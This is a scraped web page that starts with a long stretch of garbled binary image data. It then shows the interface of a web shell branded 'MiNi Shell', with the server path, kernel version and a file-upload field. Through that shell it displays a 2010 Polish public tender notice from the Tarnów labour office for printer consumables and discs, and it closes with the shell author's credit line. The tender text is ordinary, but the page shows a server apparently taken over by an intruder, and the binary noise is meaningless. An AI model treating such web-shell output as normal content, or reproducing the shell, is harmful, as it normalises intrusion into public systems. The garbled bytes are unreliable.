JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100929/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100929/311518-N-2010.html

<p class="kh_header"><b>Tarnów: Przedmiotem zamówienia jest dostawa materiałów eksploatacyjnych do sprzętu komputerowego</b><br>
<b>Numer ogłoszenia: 311518 - 2010; data zamieszczenia: 29.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Tarnowie , pl. J. Bema 3, 33-100 Tarnów, woj. małopolskie, tel. 014 6882300, faks 014 6882301.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest dostawa materiałów eksploatacyjnych do sprzętu komputerowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów eksploatacyjnych do sprzętu komputerowego wg poniższego zestawienia.
Opis przedmiotu zamówienia
Il. jedn.	jednostka
1.		Taśmy, tusze, tonery. 		
1.1.		Taśma do drukarki igłowej EPSON LQ2170 seria (S015086)*
15	szt.
1.2.		Taśma do drukarki igłowej EPSON  DFX8000  seria (C13S015055 8766)*	10	szt.
1.3.		Taśma do drukarki igłowej OKI 3320 seria (09002303)*	40	szt.
1.4.		Taśma do drukarki igłowej OKI 4410 seria (40629303)*	30	szt.
1.5.		Toner do drukarki OKI 2540 seria (09004391)*	7	szt.
1.6.		Toner do drukarki OKI 6500 seria (09004462)*	4	szt.
1.7.		Toner do drukarki HP 5200 seria (Q7516A)*	2	szt.
1.8.		Toner do drukarki HP 3030 seria (Q2612A)*	25	szt.
1.9.		Toner do drukarki HP 1320 seria (Q5949X)*	12	szt.
1.10.		Toner do drukarki KYOCERA seria ( FS1116 TK-110)*2	szt.
1.11.		Toner do drukarki XEROX DP8ex seria (113R296)*	2	szt.
1.12.		Toner do drukarki HP 3600 czarny seria (Q6470A)*	8	szt.
1.13.		Toner do drukarki HP 3600 niebieski seria (Q6471A)*	5	szt.
1.14.		Toner do drukarki HP 3600 żółty seria (Q6472A)*	5	szt.
1.15.		Toner do drukarki HP 3600 czerwony seria (Q6473A)*	5	szt.
1.16.		Toner do drukarki HP 2015 seria (Q7553X)*	8	szt.
1.17.		Tusz do drukarki HP 5150 seria (C6656AE)*	12	szt.
1.18.		Tusz do drukarki HP 5150 seria (C6657AE)*	2	szt.
1.19.		Tusz do drukarki HP 1220 seria (C6578D)*	5	szt.
1.20.		Tusz do drukarki HP K8600 88 czarny seria (C9396AE)*	5	szt.
1.21.		Tusz do drukarki HP K8600 88 żółty seria (C9393AE)*	4	szt.
1.22.		Tusz do drukarki HP K8600 88 niebieski seria (C9391AE)*	4	szt.
1.23.		Tusz do drukarki HP K8600 88 czerwony seria (C9392AE)*	4	szt.
1.24.		Tusz do drukarki HP 470WBT 337 czarny seria (C9364EE)*	8	szt.
1.25.		Tusz do drukarki HP 470WBT 343 kolor seria (C8766EE)*	6	szt.
1.26.		Toner do drukarki SAMSUNG 4551 seria (ML-D4550B)*	3	szt.
1.27.		Toner do drukarki SAMSUNG 770ND czarny seria (CLT-K6092S)*	5	szt.
1.28.		Toner do drukarki SAMSUNG 770ND czerwony seria (CLT-M6092S)*	3	szt.
1.29.		Toner do drukarki SAMSUNG 770ND niebieski seria (CLT-C6092S)*	3	szt.
1.30.		Toner do drukarki SAMSUNG 770ND żółty seria (CLT-Y6092S)*	3	szt.
					
2.		Nośniki magnetyczne i optyczne	 	
2.1.		Dysk  DVD 8,5 1-8x  Double Leyer Cake	100	szt.
2.2.		Dysk  DVD 4,7 1-16x light scribe slim	150	szt.
2.3.		Dysk  CD-R 1-52x 700 MB light scribe slim	100	szt.
3.		Środki czyszczące		
3.1.		Sprężone powietrze 400 ml	30	szt.
	OGÓŁEM		

* lub równoważne - nieregenerowane

Wykonawca zobowiązuje się dostarczyć Zamawiającemu fabrycznie nowe, w oryginalnych opakowaniach (zgodnych z zaleceniami producenta) materiały eksploatacyjne. Materiały te muszą spełniać wszystkie poniżej wymienione warunki:
1.	Materiały fabrycznie nowe wg normy ISO/IEC 19752 (gdy nie użyto do ich produkcji składników uprzednio eksploatowanych, przerabianych bądź uzupełnianych). Tusze i tonery muszą być nowe, nie regenerowane. Towar fabrycznie nowy oznacza wytworzony przez producenta z fabrycznie nowych elementów (m.in. nowa obudowa, nowy tusz, nowe oryginalne opakowanie nie noszące znamion otwierania), wolny od śladów użytkowania.
2.	Materiały posiadają nienaruszone cechy pierwotnego opakowania producenta.
3.	Muszą być opakowane:
1)	w wewnętrzne, hermetyczne opakowanie uniemożliwiające kontakt z powietrzem atmosferycznym czy zawilgoceniem
2)	w zewnętrzne pudełko tekturowe z zabezpieczeniem wewnętrznym uniemożliwiającym wewnętrzne przemieszczanie się produktu
3)	muszą posiadać na opakowaniach zewnętrznych logo i nazwę producenta, opis zawartości i numer katalogowy.
4.	Muszą pochodzić z bieżącej produkcji, celem zapewnienia ich sprawności do momentu wyczerpania się środka barwiącego - muszą posiadać co najmniej 6 miesięczny okres gwarancji. W okresie gwarancji Zamawiający ma prawo żądać a, Wykonawca na własny koszt zobowiązany jest do wymiany (w terminie 5 dni roboczych od daty zgłoszenia) towaru uszkodzonego lub niesprawnego, na towar wolny od wad.
5.	Zamawiający wymaga aby: wkłady z atramentami oraz kasety z tonerami zapewniały niezmiennie doskonałą optymalną jakość druku, bardzo ostry czysty tekst, płynne przejście w skali szarości i półtonach, które umożliwia drukowanie w wysokiej rozdzielczości oraz oddanie w najdrobniejszej szczegółów w grafice i zdjęciach.
6.	Materiały eksploatacyjne mają gwarantować wykorzystanie wszystkich funkcji drukowania danego sprzętu.

7.	Dostarczane przez Wykonawcę materiały muszą być zalecane przez producenta każdego z wymienionych urządzeń, a ich użycie w urządzeniach nie może powodować utraty gwarancji producenta urządzeń.
8.	W przypadku oferowania wkładów do drukarek ( tonery, tusze i taśmy) równoważnych Wykonawca zobowiązany jest :
4)	Doręczyć certyfikat ISO 9001 lub równoważny oraz certyfikat ISO 14001 dla producenta poszczególnych wkładów .
5)	Podać nazwy producenta oraz parametry techniczne ściśle charakteryzujące produkt.
6)	Zgodnie z art. 30, ust. 5 ustawy Prawo zamówień publicznych -  Wykonawca, powołujący się na rozwiązania równoważne, obowiązany jest wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego.   
7)	Doręczyć, w przypadku wkładów laserowych do drukarek monochromatycznych - Raport z testów wydajnościowych wkładów zgodnie 
z normą ISO/IEC 19752.
8)	Przedłożyć gwarancje, że Wykonawca dokona naprawy drukarek na własny koszt jeżeli przyczyną uszkodzenia będzie użycie zaproponowanych wkładów drukujących przez okres ich eksploatacji.
9.	W przypadku stwierdzenia przy odbiorze towaru, jakichkolwiek nieprawidłowości w asortymencie, ilości, jakości lub cenie, cała dostarczona partia towaru nie zostanie przyjęta przez Zamawiającego

Opis przedmiotu zamówienia zgodnie ze Wspólnym Słownikiem Zamówień:

KOD - 30192113-6,
OPIS - Wkłady drukujące.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie zgodne z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r.  Prawo zamówień publicznych - załącznik nr 2.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych dostaw w okresie ostatnich trzech lat przed upływem terminu   
składania ofert, a jeżeli okres prowadzenia działalności jest krótszy,  - w tym okresie, o wartości minimum   80 000,00 zł, z podaniem ich wartości, przedmiotu, daty wykonania 
      i odbiorców oraz załączeniem dokumentów (np. referencji, opinii zamawiających na rzecz 
      których zamówienia zostały zrealizowane) potwierdzających, że dostawy zostały 
      wykonane należycie -  załącznik nr 3.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie zgodne z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r.  Prawo zamówień publicznych - załącznik nr 2.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie zgodne z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r.  Prawo zamówień publicznych - załącznik nr 2.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie zgodne z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r.  Prawo zamówień publicznych - załącznik nr 2.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony formularz ofertowy- załącznik nr 1,
2)  podpisany projekt umowy - załącznik nr 5,
3) oświadczenie dotyczące powierzenia części zamówienia podwykonawcom - załącznik nr 6,
4) pełnomocnictwo do reprezentacji Wykonawcy w postępowaniu o zamówienie publiczne,  jeżeli oferta składana jest przez pełnomocnika. Treść pełnomocnictwa musi jednoznacznie określać czynności, co do wykonania których pełnomocnik jest 
upoważniony,
5) dokument, z którego będzie wynikało uprawnienie do podpisania oferty np. aktualny odpis z właściwego rejestru, zaświadczenie o wpisie do ewidencji działalności gospodarczej, statut, rejestr handlowy itp. 

W przypadku korzystania z zasobów innych podmiotów Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w tym celu należy przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

Wymagane dokumenty należy złożyć w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub upoważnionego pełnomocnika.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.90</li>
<li>2 - Termin wykonania zamówienia - 0.10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.up.tarnow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Tarnowie, pl. gen. J. Bema 3, 33-100 Tarnów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.10.2010 godzina 14:00, miejsce: Powiatowy Urząd Pracy w Tarnowie, pl. gen. J. Bema 3, 33-100 Tarnów, sekretariat, pok. 214,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com